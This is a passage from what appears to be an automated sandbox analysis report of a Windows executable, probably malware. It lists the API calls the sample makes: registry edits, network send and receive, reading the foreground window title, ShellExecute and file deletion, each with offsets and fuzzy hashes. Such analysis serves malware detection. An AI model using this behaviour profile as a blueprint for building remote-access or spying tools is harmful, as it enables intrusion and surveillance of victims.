                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: EnvironmentStrings$Free_free
                                                                    • String ID:
                                                                    • API String ID: 2716640707-0
                                                                    • Opcode ID: f3c2c49517413e8eabdba28df60095274e0f4285ab7e88089faf331cb05c3344
                                                                    • Instruction ID: a95b0472bde791e81118f5b212bf6f07b4125f005b99c6aef0626ee370485fe8
                                                                    • Opcode Fuzzy Hash: f3c2c49517413e8eabdba28df60095274e0f4285ab7e88089faf331cb05c3344
                                                                    • Instruction Fuzzy Hash: 50E06577144A216BB211362A7C49D6F2A18DFD67BA727013BF45486143DE288D0641FA
                                                                    APIs
                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                                                                    • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
                                                                    • RegCloseKey.KERNEL32(?), ref: 00413592
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID:
                                                                    • API String ID: 3677997916-0
                                                                    • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                    • Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
                                                                    • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                    • Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94
                                                                    APIs
                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C19C,00466C48), ref: 00413516
                                                                    • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040C19C,00466C48), ref: 0041352A
                                                                    • RegCloseKey.KERNEL32(?,?,?,0040C19C,00466C48), ref: 00413535
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID:
                                                                    • API String ID: 3677997916-0
                                                                    • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                    • Instruction ID: ffaae2385a847085e6fb085aa4760e2a706d619ab1068a3de776aab9102a8dd7
                                                                    • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                    • Instruction Fuzzy Hash: 46E06D32801238FB9F204FA2DC0DDEB7F6CEF06FA2B000155BD0DA2112E2258E50E6E4
                                                                    APIs
                                                                    • RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                                    • RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                                                    • RegCloseKey.KERNEL32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseCreateValue
                                                                    • String ID:
                                                                    • API String ID: 1818849710-0
                                                                    • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                    • Instruction ID: 04a42b38e2882b978ed87177a7d0f50f8458418d63be9de7f69fe35b215911ab
                                                                    • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                    • Instruction Fuzzy Hash: 16E06572500318FBEF115F90DC05FEA7B6CDF04B52F1045A5BF09A6191D3358E549798
                                                                    APIs
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                                    • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                    • recv.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404BDA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: EventObjectSingleWaitrecv
                                                                    • String ID:
                                                                    • API String ID: 311754179-0
                                                                    • Opcode ID: 027f0035fd30dc323b2ad7daf66a247a767f4e031cde928d6a9ffdf935cc617f
                                                                    • Instruction ID: 1d69a7fd2e689c68354a0251ffa64299bfe08f5f9c70e8df09ea9ad7bb005133
                                                                    • Opcode Fuzzy Hash: 027f0035fd30dc323b2ad7daf66a247a767f4e031cde928d6a9ffdf935cc617f
                                                                    • Instruction Fuzzy Hash: 00F08236108213FFD7059F10EC09E4AFB62FB84721F10862AF510522B08771FC21DBA5
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _wcslen
                                                                    • String ID: pQG
                                                                    • API String ID: 176396367-3769108836
                                                                    • Opcode ID: 5d990125ffd5e383bf808c23c959caca388f27999ab6a4b4c2277639ced086f0
                                                                    • Instruction ID: e6961f6084f98a1e57a9a6385a58e5d20214d93246a99e64d0d6a4ea431d93e1
                                                                    • Opcode Fuzzy Hash: 5d990125ffd5e383bf808c23c959caca388f27999ab6a4b4c2277639ced086f0
                                                                    • Instruction Fuzzy Hash: 8111C3319002059BCB15EF65E8529EF7BB5EF54318B10013FF406A62E2EFB8AD05CB98
                                                                    APIs
                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B7CA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: GlobalMemoryStatus
                                                                    • String ID: @
                                                                    • API String ID: 1890195054-2766056989
                                                                    • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                    • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                                                    • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                    • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                                                    APIs
                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 00404852
                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                                      • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateEventStartupsocket
                                                                    • String ID:
                                                                    • API String ID: 1953588214-0
                                                                    • Opcode ID: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                                                    • Instruction ID: 7af5cc85a36d800a693892934b5c0b91abe86707509305098cc6d5fca1b6a633
                                                                    • Opcode Fuzzy Hash: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                                                    • Instruction Fuzzy Hash: 6E0171B1408B809ED7359F38A8456977FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 42a83028ea29ee4520479fdfd1ce509581fbe236408560bbb12e48215694f405
                                                                    • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                                                                    • Opcode Fuzzy Hash: 42a83028ea29ee4520479fdfd1ce509581fbe236408560bbb12e48215694f405
                                                                    • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D
                                                                    APIs
                                                                    • GetForegroundWindow.USER32 ref: 0041BAB8
                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BACB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Window$ForegroundText
                                                                    • String ID:
                                                                    • API String ID: 29597999-0
                                                                    • Opcode ID: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                                                                    • Instruction ID: 4615795adb372a642f3ed3ff298372a60f443b3219566b47796808df054d69ed
                                                                    • Opcode Fuzzy Hash: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                                                                    • Instruction Fuzzy Hash: CCE0D875A00328A7E720A7A49C4EFE5776CEB08701F0000EEBA18D71C2EAB4AD04C7E4
                                                                    APIs
                                                                    • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,00415188,00000000,00000001), ref: 00414F0B
                                                                    • WSASetLastError.WS2_32(00000000), ref: 00414F10
                                                                      • Part of subcall function 00414D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                                                      • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E17
                                                                      • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                                                      • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                                                      • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E76
                                                                      • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                                                      • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                                                      • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                    • String ID:
                                                                    • API String ID: 1170566393-0
                                                                    • Opcode ID: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                                                                    • Instruction ID: cadd3d9b0d0923a9352550a0b766658ea18523973fceddbfefdc7c35282954d4
                                                                    • Opcode Fuzzy Hash: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                                                                    • Instruction Fuzzy Hash: 9ED017322015316BD320A769AC01AFBAA9EDBD7771B16003BFA08D3210D6949C8282E8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c1bd85037f78227014944570c8e1386f57ec7c93b410e94521ce381e63f7069c
                                                                    • Instruction ID: 7a76c105a712203ac593d2e3a9180375903654e9edbd33c69f6c8f8a5c58a470
                                                                    • Opcode Fuzzy Hash: c1bd85037f78227014944570c8e1386f57ec7c93b410e94521ce381e63f7069c
                                                                    • Instruction Fuzzy Hash: 971123B27201019FD7149B18C890FA6B76AFF51721B59425AE202CB3B2DB30EC91C694
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                                                    • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                                                                    • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                                                    • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                                                                    APIs
                                                                    • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Startup
                                                                    • String ID:
                                                                    • API String ID: 724789610-0
                                                                    • Opcode ID: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                                                    • Instruction ID: a24ce82555f98f109a53945ea9c337c8597cdca763f75144b39f195b4e3f482d
                                                                    • Opcode Fuzzy Hash: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                                                    • Instruction Fuzzy Hash: 0DD0C9325586088AE620AAB4AD0B8A4775C8312615F0007AA6CA5835D2E6446A19C2AA
                                                                    APIs
                                                                    • std::_Deallocate.LIBCONCRT ref: 00402E2B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Deallocatestd::_
                                                                    • String ID:
                                                                    • API String ID: 1323251999-0
                                                                    • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                    • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                                                                    • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                    • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411DE7,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CB3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                    • Instruction ID: 079a7b638a28e99b338f4493b6ebfa8105bff269478f0661155a893ef6bf0f7e
                                                                    • Opcode Fuzzy Hash: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                    • Instruction Fuzzy Hash: 13B00872418382EBCF02DF90DD0492ABAB2BB88741F184C5CB2A14107187228428EB06
                                                                    APIs
                                                                    • SetEvent.KERNEL32(?,?), ref: 00407CB9
                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                                                                    • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                                                                      • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                                                      • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                                                      • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                                                      • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                                                      • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                                                      • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                      • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                      • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                                                                    • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00408278
                                                                    • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
